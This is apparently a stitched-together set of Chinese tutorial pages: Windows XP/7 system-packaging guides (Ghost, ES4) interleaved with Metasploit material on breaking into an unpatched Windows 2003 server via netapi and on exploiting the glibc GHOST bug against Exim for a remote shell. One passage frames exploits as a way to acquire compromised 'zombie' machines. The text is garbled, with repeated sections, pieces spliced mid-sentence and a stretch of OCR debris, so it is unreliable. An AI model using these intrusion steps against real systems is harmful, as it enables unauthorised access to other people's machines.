(一)备份当前操作系统 封装的第一步,其实是备份当前安装好的操作系统。避免我们在之后的步骤中出现问题,以至于还要重新安装操作系统,浪费时间精力。 系统备份想必大家都会。对于WinXP而言,建议使用Ghost备份。推荐使用U盘装机助理中的Easy Image X 执行Ghost备份操作,Easy Image X 具有图形化操作、便于设置压缩率等特点。 提醒大家要注意的是,我们现在是备份系统以备不时之需,而并非封装完毕后制作系统映像,所以压缩率不用调整的过高,以免浪费更多的备份和恢复时间。压缩率建议选择“快速压缩”,体积略大,但备份和恢复速度都很快。设置完毕后,Ghost备份过程自动启动。
2013-1-22 14:15 上传 下载附件(125.39 KB) 稍事等待后,系统备份完毕。 (二)封装前的准备 封装的目的,是为了快速的部署操作系统,减少不必要的重复劳动。所以,我们需要向源系统集成系统补丁、安装常用软件,从而减少每次部署后的重复劳动。 1、集成系统补丁。集成补丁的方法有很多,例如使用Windows Update、使用第三方安全软件、使用第三方补丁包等。这里推荐大家选用IT天空系统补丁安装助理,一次性安装所有重要补丁。
2、安装常用软件。常用软件常用的一般也就几种,大家请根据自己的系统部署范围而决定。
特别提醒 (1)不是所有的软件都能良好适应系统封装部署,特别是某些国产软件; (2)需要激活的软件,部署完毕后一般都需要重新激活; (3)不建议集成安全类软件,某些安全软件会阻挡正常的系统部署进程,甚至导致蓝屏宕机; (4)如果某些软件不适合集成在系统,可以使用首次进桌面静默安装的方法来解决。 3、备份系统。又备份系统?对,备份。补丁安装要20分钟左右,软件也需要逐个安装与调整,所以整体时间一般不少于30分钟。为防止封装时出现未知错误,建议再次备份系统,以备今后的调整操作。这次备份完,我们就可以放心大胆的开始封装操作了。
XP系统封装图文教程(ES4)
ES4完美封装图文教程-虎鲨软件站 作者:S大源于天空,高仿必究 (一)备份当前操作系统 封装的第一步,其实是备份当前安装好的操作系统。避免我们在之后的步骤中出现问题,以至于还要重新安装操作系统,浪费时间精力。 系统备份想必大家都会。对于WinXP而言,建议使用Ghost备份。推荐使用U盘装机助理中的Easy Image X 执行Ghost备份操作,Easy Image X 具有图形化操作、便于设置压缩率等特点。 提醒大家要注意的是,我们现在是备份系统以备不时之需,而并非封装完毕后制作系统映像,所以压缩率不用调整的过高,以免浪费更多的备份和恢复时间。压缩率建议选择“快速压缩”,体积略大,但备份和恢复速度都很快。设置完毕后,Ghost备份过程自动启动。
稍事等待后,系统备份完毕。 (二)封装前的准备 封装的目的,是为了快速的部署操作系统,减少不必要的重复劳动。所以,我们需要向源系统集成系统补丁、安装常用软件,从而减少每次部署后的重复劳动。 1、集成系统补丁。集成补丁的方法有很多,例如使用Windows Update、使用第三方安全软件、使用第三方补丁包等。这里推荐大家选用IT天空系统补丁安装助理,一次性安装所有重要补丁。
2、安装常用软件。常用软件常用的一般也就几种,大家请根据自己的系统部署范围而决定。
特别提醒 (1)不是所有的软件都能良好适应系统封装部署,特别是某些国产软件; (2)需要激活的软件,部署完毕后一般都需要重新激活; (3)不建议集成安全类软件,某些安全软件会阻挡正常的系统部署进程,甚至导致蓝屏宕机; (4)如果某些软件不适合集成在系统,可以使用首次进桌面静默安装的方法来解决。 3、备份系统。又备份系统?对,备份。补丁安装要20分钟左右,软件也需要逐个安装与调整,所以整体时间一般不少于30分钟。为防止封装时出现未知错误,建议再次备份系统,以备今后的调整操作。这次备份完,我们就可以放心大胆的开始封装操作了。 (三)第一阶段封装 Easy Sysprep v4 (ES4)与之前ES3、ES2以及传统封装辅助工具最大的不同,在于其将封装分为了两个阶段。 第一阶段:以完成封装操作为首要目的; 第二阶段:以完成对系统的调整为首要目的。 将封装与调整分开,减少调整操作对封装操作的影响,保障封装成功率。 1、启动ES4
metasploit开发使用详细解析
Metasploit 目录 一、metasploit简介 (1) 二、搭建metasploit环境 (1) 三、metasploit的使用 (2) 四、Metasploit攻击方法分类 (3) 五、Metasploit架构 (4) 六、Metasploit二次开发方法 (6) 七、安全软件常用检测方法 (6) 八、Metasploit反检测方法 (7) 九、一般攻击的过程 (7) 十、恶意软件分类 (8) 十一、exploits详细解析之proftp_telnet_iac.rb (8) 一、metasploit简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。 这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。 目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。 其核心中一小部分由汇编和C语言实现,其余由ruby实现。不建议修改汇编和C语言部分。 二、搭建metasploit环境 Windows环境下安装。 从官方网站https://www.360docs.net/doc/126688766.html,/下载windows版本的安装版,直接安装即可。安装的版本是3.5.1。安装时需要注意以下两点: 1在安装的时候要关闭杀毒软件。否则的话会导致杀毒软件和metasploit冲突,导致安装失败。 2在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中选择英文(美国)。因为在安装的时候,会进行检测,如果属于非英文地区会导致安装失败。
远航技术Windows 7制作、封装教程_远航技术_新浪博客
自个就不做了,VDH恢复的方法也很简单,Google 去吧 整理一些资料,有兴趣的朋友可以自己定制个属于自己的Windows 7`` 封装 & 安装教程 一、系统安装: Windows 7 版本任意 安装好系统后可以,安装你想要的软件 比如汉化包等等都可以`` 二、安全调整: 对系统进行手动调整,流程如下: 1、C:\Windows\Web\Wallpaper 里面是Windows自带墙纸,不需要的可以删除掉,或者转移至其他盘(50M) 2、C:\Windows\System32\DriverStore\FileRepository 这个文件夹中是Window自带驱动备份,一般来说都不需要,所以可以删除(1.06G),但是删除后系统恢复时无法找到驱动,建议不要删除。当然了,如果你想直接删除这个文件夹的话,系统会提示你没有权限,所以我们就要获得这个权限。首先在C:\Windows\System32\DriverStore\FileRepository上点击右键-属性,我们先来获得这个文件夹的所有权,点安全-高级-所有者,接着点编辑-高级其他用户或组,在输入选择的对象名称里面输入你的用户名,或者点高级-立即查找,选择你的用户名,确定,然后选择替换子容器和对象的所有者,不选择这个的话,我们就只有这个文件夹的所有权,并没有他的子文件夹和里面的文件的所有权,然后应用-确定,这样我们就拥有了这个文件夹的所有权,因为之前这个文件夹的所有权是属于System,并不属于我们。再点权限-编辑-添加,把你的用户名填入或者用高级-立即查找,确定,再点击你的用户名-编辑,把完全控制/允许那个打勾,确定,再把使用可从此对象继承的权限替换所有后代上现有的可继承权限打勾,同前面,这个不打勾你就只有外面那文件夹权限,里面的文件夹还是不能“完全控制”,然后点应用-确定-确定-确定。好了,里面的文件夹,你想怎么删就怎么删吧。 3、C:\Windows\Downloaded Installations 有一些程序(Dreamweaver。。)安装的时候会把安装文件解压至此文件夹里面,可以删除之
metasploit 渗透2003server教程
Metasploit 渗透未打补丁的windows 2003 server 教程 演示之前,我先介绍一下演示的环境配置:使用Vware10.0构建两个虚拟机,分别采用kali-linux和windows 2003 server sp3操作系统,宿主机操作系统是windows 7。首先将windows 2003 server sp3 虚拟机作为被渗透的目标机,IP地址为192.168.1.103;kali-linux虚拟机作为攻击机,IP地址为192.168.1.2。之所以选择kali-linux系统作为攻击机,是因为其本身就是黑客最常用攻击的平台,系统整合了许多用于攻击的程序。Kali-linux系统界面如下图1所示。靶机windows2003server sp3 系统如图2 所示。 图1 目标主机的截图
图2 首先,在kali-linux系统终端运行:service postgresql start和service metasploit start 两个命令,其中前者是开启SQL数据库服务的命令,后者是运行metasploit渗透测试框架程序的命令。如图3所示,表明服务运行成功。接着在终端输入msfconsole命令,运行metasploit 命令行程序,程序运行成功。如图4所示。 开启服务
图3 运行msfconsole 图4 由于windows 2003 server 是微软应用最广泛的企业级操作系统之一,这次我们针对其netapi32.dll漏洞进行渗透。至于为什么会针对此漏洞进行渗透,是因为通过前期大量的扫描获得了主机存在这个漏洞信息,这些工作不在此次演示范围,在此忽略。 第二步,运行search netapi 命令搜索netapi,在metasploit框架中列出所有与netapi相关的漏洞利用代码。如图5所示。
基于Metasploit利用GHOST漏洞最终版
基于Metasploit利用GHOST 漏洞获得远程Exim邮件服务器SHELL 分析阶段 1.GHOST漏洞分析及其条件限制 2.如何利用受GHOST漏洞影响的Exim服务的原理 实际操作阶段 1.渗透环境搭建:KaliLinux与Metasploit 2.使用Nmap对目标进行端口扫描及服务查点 3.快速检查被渗透目标是否存在ghost漏洞 4.使用Metasploit加载GHOST漏洞攻击模块进行远程入侵,获得远程主 机shell ========= 分析开始 ========= GHOST漏洞分析及其条件限制 GHOST漏洞是2015年1月27号公布的Linux底层漏洞,国际编号为CVE-2015-0235,存在于GNU C库(glibc)中,受影响的Linux发现版本有:Debian 7 (wheezy),Red Hat Enterprise,Linux 6 & 7,CentOS 6 & 7,Ubuntu 12.04等。 存在漏洞的函数__nss_hostname_digits_dots()由glibc的非重入版本的文件:
nss/getXXbyYY.c,以及重入版本:nss/getXXbyYY_r.c提供。然而,这个函数的调用是由#ifdef HANDLE_DIGITS_DOTS来定义的,这个宏定义只在这几个文件有: - inet/gethstbynm.c - inet/gethstbynm2.c - inet/gethstbynm_r.c - inet/gethstbynm2_r.c - nscd/gethstbynm3_r.c 以上这些文件实现gethostbyname*()函数族,因此也只有它们会调用__nss_hostname_digits_dots(),并且可能触发它的缓冲区溢出。该函数的作用是:“如果主机名是IPv4/IPv6地址,就跳过费时的DNS查找”。 glibc-2.17的代码如下: 35 int 36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf, 37 char **buffer, size_t *buffer_size, 38 size_t buflen, struct hostent **result, 39 enum nss_status *status, int af, int *h_errnop) 40 { .. 57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':') 58 { 59 const char *cp; 60 char *hostname; 61 typedef unsigned char host_addr_t[16]; 62 host_addr_t *host_addr; 63 typedef char *host_addr_list_t[2]; 64 host_addr_list_t *h_addr_ptrs; 65 char **h_alias_ptr; 66 size_t size_needed; .. 85 size_needed = (sizeof (*host_addr) 86 + sizeof (*h_addr_ptrs) + strlen (name) + 1); 87 88 if (buffer_size == NULL) 89 { 90 if (buflen < size_needed) 91 { .. 95 goto done;
Ghost系统封装详细图文教程
GHOST系统封装详细图文教程[完整版](适合初学者) 2009-06-28 21:42 教程架构: 第一篇系统、工具及软件安装 第二篇封装工具选择及实战 第三篇光盘ISO文件制作 下面以封装制作GHOSTXPSP3为例,进行讲解! 第一篇系统、工具及软件安装 一、准备工作 1、操作系统选择:建议采用微软官方的VOL原版 ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活! ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。 2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载 如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集——系统之家,每月都有更新! 也可以使用360安全卫士下载,然后收集整理。 3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软件,也建议采用微软原版,不要使用修改版。 Microsoft Office 2003_vol原版 Microsoft Office 2003 Service Pack 3 2007 office system格式兼容文件 4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本! 二、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并使用
PS/2鼠标操作! 系统安装好后就可以进行系统补丁、工具软件、办公软件的安装——这里讲点窍门:先装工具软件、办公软件,最后装系统补丁。因为很多集成补丁包里面含有WMP、OFFICE、DX、AX补丁,如果先装,可能你的OFFICE 补丁就不是很完整。 2、系统主题屏保安装: 首先进行系统主题破解,这里有适合XPSP2、XPSP3使用的破解程序 然后是安装系统主题 三、系统设置 ——这是一个比较复杂的东西,很多人都有自己的理解,也有自己的爱好。 1、设置任务栏:建议按如下图进行设置 2、任务栏快捷图标建议保留三个(如下图) 3、系统属性设置: A)远程设置——把两个勾都去掉
GHOST系统封装详细教程(适合初学者)
看到很多会员说封装时出现各种各样的问题,感觉还是因为看的封装教程太多,封装工具也太多、太乱,都不知道该怎么具体操作了,所以会出现这样那样的错误。本人就将自己的封装经验写出来分享一下。 本文中涉及的文章及帖子,可能部分会员无法阅读,如果是这种情况,请你努力发表有意义的帖子,达到中级会员,这样就可以阅读了。对你造成的不便还请谅解! 教程架构: 第一篇系统、工具及软件安装 第二篇封装工具选择及实战 第三篇光盘ISO文件制作 下面以封装制作GHOSTXPSP3为例,进行讲解! 第一篇系统、工具及软件安装 一、准备工作 1、操作系统选择:建议采用微软官方的VOL原版 ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活! ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。 详情可以参阅帖子: Windows_XP_Service_Pack_3_X86_CD_VOL_CN微软官方原版下载: 2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载 如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集——系统之家,每月都有更新! 也可以使用360安全卫士下载,然后收集整理。 3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软件,也建议采用微软原版,不要使用修改版。 Microsoft Office 2003_vol原版下载
Microsoft Office 2003 Service Pack 3下载 2007 office system格式兼容文件下载 4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本! 推荐下载 二、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并使用PS/2鼠标操作! 系统安装好后就可以进行系统补丁、工具软件、办公软件的安装——这里讲点窍门:先装工具软件、办公软件,最后装系统补丁。因为很多集成补丁包里面含有WMP、OFFICE、DX、AX补丁,如果先装,可能你的OFFICE补丁就不是很完整。 2、系统主题屏保安装: 首先进行系统主题破解,这里有适合XPSP2、XPSP3使用的破解程序 然后是安装系统主题 三、系统设置 ——这是一个比较复杂的东西,很多人都有自己的理解,也有自己的爱好。
完整版Metasploit利用溢出漏洞远控Windows靶机操作指南
1网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境, 包括如图1所示的运行Kali Linux 系统的计算机,如图2所示的Windows Server 2003系统的计算机和如图 3所示的运行 Windows 7系统的计算机。显然这三台计算机处于同一个网段中, 可以相互通讯,Kali 系统用作攻击机,下面将在此系统上运行 Metasploit 进行 渗透测试,而 Windows 2003和Windows 7系统都是本次任务中需要进行渗透入 图1 Kali 攻击机 侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。 root Mlflj 2 Ki3) f 厂 mine: 0 carrie 『;3 F 叽 r-1j 3 kA 丄PM AppLitutlgin 兮 PLic 砂常 l*-l Link enc ap r Lor al L 二口pback Irwt 1 LmtB add r i : :1/12B UP LOOPBACK RUNNING packets : 32 归「厂口 [厂石 TX packets : 32 er rars RX fl -4 IFcanflg Llrik anc4p :EThemQt HWidek ftG L G C .29^30:25: fl inot addr-l :0_] 0.10.13? Beast 11?. 10.13.255 貼 Lnatfi addn fgfid r 1513c = 29f f : fofifli:25t 1/^4 JScjppa : I UP BROADCAST HUftNI^G MULHC4ST hlTU:垢舲 Moir R H pKket§: 136S7 errors:? repped :9 ovtrnjri9:9 IM packets :2S£I 92 e r r : rs:& d repp^d : G overnjfisM3 c oil 丄^icns : D t Kqdfi je L 色n :1 HUJ X J ftH b>T?:9U9JS {?Q,5 Kim TK b/tH :117672Lfi Hwle 苦乩(L0卫 Stope: Hast MTU: 655 3S Metric:! i z B dropped ; 3 o^erruriB : 0 i :0 dropped :fl overruns :A :? _ ilo fc&i Via^r Sajieh T Metasploit Framework命令汇总一、msfconsole ? 帮助菜单 back 从当前环境返回 banner 显示一个MSF banner cd 切换目录 color 颜色转换 connect 连接一个主机 exit 退出MSF help 帮助菜单 info 显示一个或多个模块的信息 irb 进入irb脚本模式 jobs 显示和管理作业 kill 杀死一个作业 load 加载一个插件 loadpath 在一个路径搜索并加载模块 quit 退出MSF resource 运行存储在一个文件中的命令 route 查看一个会话的路由信息 save 保存动作 search 搜索模块名和描述 set 给一个变量赋值 setg 把一个值赋给全局变量 show 显示所给类型的模块,或所有模块 sleep 在限定的秒数内什么也不做 unload 卸载一个模块 unset 解除一个或多个变量 unsetg 解除一个或多个全局变量 use 通过名称选择一个模块 version 显示MSF和控制台库版本号 二、database db_add_host 添加一个或多个主机到数据库 db_add_note 添加一个注释到主机 db_add_port 添加一个端口到主机 db_connect 连接一个存在的数据库 db_create 创建一个新的数据库实例 db_del_host 从数据库删除一个或多个主机 db_del_port 从数据库删除一个端口 db_destroy 删除一个存在的数据库 db_disconnect 断开与当前数据库实例的连接 db_driver 指定一个数据库驱动 db_hosts 列出数据库中的所有主机 系统封装,说简单就是把系统制作成镜像的方法刻录到光盘,用在系统安装上面.系统封装,不同于系统的正常安装。最本质的区别在于系统封装是将一个完整的系统以拷贝的形式打包,然后用粘贴的形式安装在另外一个系统盘上,而正常安装则是通过Setup程序进行安装。举一个不太贴切的例子,你要铺草坪,你可以在那片土地上撒草籽等待草的长成,也可以直接购买草皮。而这层草皮就相当于系统封装。使用系统封装可以把系统安装的时间缩短NN 倍,封装安装方法安装系统只需要5-10分钟!而比正常安装大大节约了时间。 目录 一、前期基础工作 二、系统DIY 三、系统减肥(可选) 四、更改系统硬件驱动(关键) 五、整理磁盘碎片(推荐) 六、系统封装(推荐) 七、制作Ghost系统镜像文件 八、制作启动光盘 ============================================================ 万能Ghost系统封装教程(完整) 目录 一、前期基础工作 二、系统DIY 三、系统减肥(可选) 四、更改系统硬件驱动(关键) 五、整理磁盘碎片(推荐) 六、系统封装(推荐) 七、制作Ghost系统镜像文件 八、制作启动光盘 九、附录 一、前期基础工作 1、准备封装所需工具软件 *虚拟机VMware vmware+5.5.3+中英双语精简版 *Windows2K/XP/2003系统安装光盘(推荐使用免激活的版本) *DEPLOY.CAB(在系统安装光盘:\SUPPORT\TOOLS目录下提取) *YLMF 系统DIY Y1.6(系统信息修改工具) *Drivers.exe(系统补充驱动程序包) *Drvtool.exe(驱动程序选择工具) *Convert.exe(系统盘转换为NTFS格式工具,可以从YLMF的Ghost系统中提取)*DllCacheManager_V2.0(DLL文件备份恢复工具) *Font_Fix_1.0.exe(字体文件夹减肥程序) *CorePatch.exe(酷睿双核CPU补丁) *cfgtool.exe(深度系统设置工具) *UXTheme Multi-Patcher (Neowin Edition) 4.0.exe(主题破解程序) *Ghost_v8.3(v8.0以上版本才能够支持NTFS分区) 2、需要替换的系统资源 *桌面背景壁纸(C:\WINDOWS\Web\Wallpaper)800*600以上 *安装时的背景图片(C:\WINDOWS\system32)800*600/1024*768 *OEM图片(C:\WINDOWS\system32)169*60 使用计算机,最头疼的还是自己的机子系统被摧毁,导致我们需要重新安装,如果手里没有几张系统盘,更是让人很懊恼的事! 一直来是用GHOST来安装系统的,比如箫心的、系统之家的、龙帝国的几款GHOST都非常棒! 如果自己做个GHOST安装盘,里面带上自己的LOGO,是件非常令人愉快和骄傲的事!!!!! 好了,就让柱子带大家一起打造属于我们自己的系统,完成我们的这个不是梦想的梦想! 先来看看我仓促做的系统界面(由于是制作本教程时附带临时做的) 第一步为安装虚拟环境,这个过程在前几天我已经专 门发了相关的内容,详细内容请移至站内链接: 虚拟机【VMware】详细图解[让你在虚拟世界安装系统]https://www.360docs.net/doc/126688766.html,/pc/thread-930348-1-1.html 一、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并使用PS/2鼠标操作! 系统安装好后就可以进行系统补丁、工具软件、办公软件的安装——这里讲点窍门:先装工具软件、办公软件,最后装系统补丁。因为很多集成补丁包里面含有WMP、OFFICE、DX、AX补丁,如果先装,可能你的OFFICE 补丁就不是很完整。 2、系统主题屏保安装: 首先进行系统主题破解,这里有适合XPSP2、XPSP3使用的破解程序,然后是安装系统主题 二、系统设置 这是一个比较复杂的东西,很多人都有自己的理解,也有自己的爱好。 1、设置任务栏:建议按如下图进行设置 2、任务栏快捷图标建议保留三个(如下图) 3、系统属性设置: 远程设置——把两个勾都去掉 自动更新设置——关闭自动更新 系统还原设置——关闭系统还原 高级设置: 性能选项——选图示的三项就行了 强大溢出工具包:Metasploit命令行下的使用https://www.360docs.net/doc/126688766.html,/bbs/jsp/view.jsp?articleID=1709641 Metasploit 是个好东西,实在想不到别的办法了,或许这东西能帮你一下,Metasploit包含了众多exploit,说不准还能用上几个,搞几台好肉鸡. 下载Metasploit双击进行安装,非常简单,一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat 和msfweb.bat,第一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用方法,运行后我们看到的是metasploit的欢迎界面,输入“?”查看帮助,如图1 看到很多命令吧,我们来解释一下 “?”帮助 “cd” :这个命令大家都熟悉,和WIN下面一样,切换目录 “exit”这个就是退出的意思 “info”显示当前程序信息 “quit”退出程序 “reload”加载exploit和payloads “save”保存设置 “setg”设置一个环境变量 “show”显示当前可用的exploit “ use”选择一个exp “version”显示程序版本 这么多命令看起来肯定有些晕了吧其实用到的就"show" "info" "use"这3个,我们来看看是怎么使用的 这个程序就是一个大的工具包,集成了N多EXPLOIT,我们可以用show exploits看看有哪些exploit程序,如图2 Return to Gallery | Original Image 看到了吧?这么多溢出程序,想用哪个就用哪个,省得整天找。这么多的东西该怎么用呢??比如我想用一个溢出程序,肯定得先看他的帮助了解使用方法。这就得用到info命令啦。这个命令就是显示溢出程序 Win7系统封装制作的全过程 网上有很多的各种修改版的系统,作为熟悉电脑的老手们是只使用纯净版系统的,毕竟,网上的修改版系统即使没有病毒木马,也给你塞了一堆你不喜欢的东西。可是,每次自己重装纯净版系统还是要安装很多自己常用的软件,还要去挨个做下系统配置来适应自己的习惯,自己家的电脑、公司的电脑都可能碰到这个问题,这个时候,我们就可以考虑动手DIY一个专属自己的系统了,是的,这就是封装。 很多人都认为制作封装系统是一件很复杂、很高深的事情。事实上,真正做过1次封装系统以后,就会发现做封装系统并不困难。只要具有一定电脑基础(会装操作系统、安装软件,能够比较熟练地使用常用的应用软件),再加上一点点细心和耐心,这样,制作一个专属于自己的封装系统就是一件轻而易举的事情了。下面,我们一起来制作专属自己的Windows7封装系统吧。 工具/原料 封装前准备 Windows7系统官方发布的安装光盘(镜像) 需要预装的各种应用软件,如Office/WPS、Photoshop等等 UltraISO和Windows7AIK。 WindowsPE光盘(最好是Windows7PE光盘)。Windows7PE光盘可以使用Windows7AIK 制作 然后,封装制作win7系统就开始了。 步骤/方法 安装操作系统和应用程序 2 安装Windows7操作系统。 安装操作系统有4个环节要注意: ①操作系统最好安装在C盘,安装期间(包括后面安装应用程序和进行封装)最好不要连接到网络。 ②如果在安装操作系统过程中输入序列号,进行封装以后再重新安装操作系统不会再提示输入序列号。除非要制作成OEM版的封装系统,否则在安装过程中提示输入序列号时,不要输入序列号,直接点“下一步”继续系统的安装。 ③为保持封装系统纯净,安装好Windows7操作系统后最好不要安装硬件的驱动。当然,安装驱动程序也不会影响系统的封装。 ④为避免调整优化系统、安装应用软件过程中出现不必要的错误和产生错误报告文件,第一次进入系统后应当禁用UAC和关闭错误报告。禁用UAC和关闭错误报告的方法如下:打开“控制面板”,点击“系统和安全”,选择“操作中心”,点击“安全”,在展开的详细设置内容中找到并点击“用户帐户控制”下方的“选择metasploit命令集
教你如何封装系统-系统封装教程
教你制作属于自己的GHOST系统【图文教程】
Metasploit命令行下的使用
win 系统封装wim教程